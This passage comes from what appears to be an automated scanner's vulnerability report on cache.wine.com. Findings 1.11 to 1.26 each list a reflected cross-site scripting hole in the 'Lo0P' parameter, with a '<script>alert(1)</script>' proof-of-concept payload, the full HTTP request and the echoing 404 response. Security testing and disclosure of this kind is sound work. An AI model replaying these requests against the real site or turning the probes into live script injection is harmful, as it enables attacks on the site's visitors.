GET /images/css/HomeNavRtArrow.jpg?Lo0P=aced8<script>alert(1)</script>ddba18ef896 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/HomeNavRtArrow.jpg?Lo0P=aced8<script>alert(1)</script>ddba18ef896 was not found on this server.<P>
...[SNIP]...

1.11. http://cache.wine.com/images/css/facebookIcon.png [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/css/facebookIcon.png

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 4ef06<script>alert(1)</script>e8f7327a8f7 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/facebookIcon.png?Lo0P=4ef06<script>alert(1)</script>e8f7327a8f7 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 263
Date: Mon, 14 Feb 2011 17:16:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/facebookIcon.png?Lo0P=4ef06<script>alert(1)</script>e8f7327a8f7 was not found on this server.<P>
...[SNIP]...

1.12. http://cache.wine.com/images/css/greyPlus.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/css/greyPlus.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 4c70a<script>alert(1)</script>49718bb4565 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/greyPlus.gif?Lo0P=4c70a<script>alert(1)</script>49718bb4565 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 259
Date: Mon, 14 Feb 2011 17:16:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/greyPlus.gif?Lo0P=4c70a<script>alert(1)</script>49718bb4565 was not found on this server.<P>
...[SNIP]...

1.13. http://cache.wine.com/images/css/iconWineMan.png [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/css/iconWineMan.png

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload f224b<script>alert(1)</script>8b190a1140 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/iconWineMan.png?Lo0P=f224b<script>alert(1)</script>8b190a1140 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 261
Date: Mon, 14 Feb 2011 17:16:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/iconWineMan.png?Lo0P=f224b<script>alert(1)</script>8b190a1140 was not found on this server.<P>
...[SNIP]...

1.14. http://cache.wine.com/images/glo_icon_bubbly_big.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_bubbly_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload da267<script>alert(1)</script>96597c1d1a3 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_bubbly_big.gif?Lo0P=da267<script>alert(1)</script>96597c1d1a3 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 266
Date: Mon, 14 Feb 2011 17:16:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_bubbly_big.gif?Lo0P=da267<script>alert(1)</script>96597c1d1a3 was not found on this server.<P>
...[SNIP]...

1.15. http://cache.wine.com/images/glo_icon_collectable_big.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_collectable_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload c581e<script>alert(1)</script>6840ce25c4e was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_collectable_big.gif?Lo0P=c581e<script>alert(1)</script>6840ce25c4e HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 271
Date: Mon, 14 Feb 2011 17:16:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_collectable_big.gif?Lo0P=c581e<script>alert(1)</script>6840ce25c4e was not found on this server.<P>
...[SNIP]...

1.16. http://cache.wine.com/images/glo_icon_gift_big.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_gift_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 44649<script>alert(1)</script>0c09d6efe7e was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_gift_big.gif?Lo0P=44649<script>alert(1)</script>0c09d6efe7e HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 264
Date: Mon, 14 Feb 2011 17:16:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_gift_big.gif?Lo0P=44649<script>alert(1)</script>0c09d6efe7e was not found on this server.<P>
...[SNIP]...

1.17. http://cache.wine.com/images/glo_icon_kosher_big.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_kosher_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 58648<script>alert(1)</script>2d2522bbc2a was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_kosher_big.gif?Lo0P=58648<script>alert(1)</script>2d2522bbc2a HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 266
Date: Mon, 14 Feb 2011 17:16:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_kosher_big.gif?Lo0P=58648<script>alert(1)</script>2d2522bbc2a was not found on this server.<P>
...[SNIP]...

1.18. http://cache.wine.com/images/glo_icon_red_big.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_red_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 15c6f<script>alert(1)</script>a5227658ddb was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_red_big.gif?Lo0P=15c6f<script>alert(1)</script>a5227658ddb HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 263
Date: Mon, 14 Feb 2011 17:16:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_red_big.gif?Lo0P=15c6f<script>alert(1)</script>a5227658ddb was not found on this server.<P>
...[SNIP]...

1.19. http://cache.wine.com/images/glo_icon_rose_big.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_rose_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload df5a8<script>alert(1)</script>fcb090da3f2 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_rose_big.gif?Lo0P=df5a8<script>alert(1)</script>fcb090da3f2 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 264
Date: Mon, 14 Feb 2011 17:16:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_rose_big.gif?Lo0P=df5a8<script>alert(1)</script>fcb090da3f2 was not found on this server.<P>
...[SNIP]...

1.20. http://cache.wine.com/images/glo_icon_video_big.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_video_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 6b333<script>alert(1)</script>518ce946ae8 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_video_big.gif?Lo0P=6b333<script>alert(1)</script>518ce946ae8 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_video_big.gif?Lo0P=6b333<script>alert(1)</script>518ce946ae8 was not found on this server.<P>
...[SNIP]...

1.21. http://cache.wine.com/images/glo_icon_white_big.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_white_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload b6e80<script>alert(1)</script>c7eb9779310 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_white_big.gif?Lo0P=b6e80<script>alert(1)</script>c7eb9779310 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:27 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_white_big.gif?Lo0P=b6e80<script>alert(1)</script>c7eb9779310 was not found on this server.<P>
...[SNIP]...

1.22. http://cache.wine.com/images/rating90.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/rating90.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 58bf6<script>alert(1)</script>66ff2140e18 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/rating90.gif?Lo0P=58bf6<script>alert(1)</script>66ff2140e18 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/rating90.gif?Lo0P=58bf6<script>alert(1)</script>66ff2140e18 was not found on this server.<P>
...[SNIP]...

1.23. http://cache.wine.com/images/rating91.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/rating91.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 122b3<script>alert(1)</script>a2c714fb695 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/rating91.gif?Lo0P=122b3<script>alert(1)</script>a2c714fb695 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/rating91.gif?Lo0P=122b3<script>alert(1)</script>a2c714fb695 was not found on this server.<P>
...[SNIP]...

1.24. http://cache.wine.com/images/rating94.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/rating94.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload f838d<script>alert(1)</script>333dce6039d was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/rating94.gif?Lo0P=f838d<script>alert(1)</script>333dce6039d HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/rating94.gif?Lo0P=f838d<script>alert(1)</script>333dce6039d was not found on this server.<P>
...[SNIP]...

1.25. http://cache.wine.com/images/ratingBH.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/ratingBH.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 22234<script>alert(1)</script>34ff4f92558 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingBH.gif?Lo0P=22234<script>alert(1)</script>34ff4f92558 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingBH.gif?Lo0P=22234<script>alert(1)</script>34ff4f92558 was not found on this server.<P>
...[SNIP]...

1.26. http://cache.wine.com/images/ratingCG.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/ratingCG.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 70095<script>alert(1)</script>d0259add5c3 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingCG.gif?Lo0P=70095<script>alert(1)</script>d0259add5c3 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
